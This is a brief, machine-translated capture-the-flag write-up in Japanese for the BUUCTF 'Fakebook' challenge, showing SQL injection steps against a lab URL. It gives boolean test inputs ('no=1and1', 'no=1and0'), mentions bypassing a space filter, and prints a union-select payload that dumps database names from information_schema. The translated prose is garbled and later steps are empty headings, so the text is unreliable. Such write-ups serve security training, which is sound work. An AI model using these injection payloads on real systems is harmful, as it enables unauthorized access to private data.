BUUCTF | Fakebook

1.このインタフェース見出さ登録後、注入点ではない憶測があります

http://654000be-ea72-4eae-8074-c6cf2798c9e9.node3.buuoj.cn/view.php?no=1and1 
http://654000be-ea72-4eae-8074-c6cf2798c9e9.node3.buuoj.cn/view.php?no=1and0

 

 4による2.order(ここで、空間フィルタの存在)の長さを得るために

3.爆発ライブラリ名

/view.php?no=-1++union++select++1,group_concat(schema_name),3,4++from++information_schema.schemata--+

 

 4.バーストテーブル名

 

おすすめ

転載: www.cnblogs.com/chrysanthemum/p/11784487.html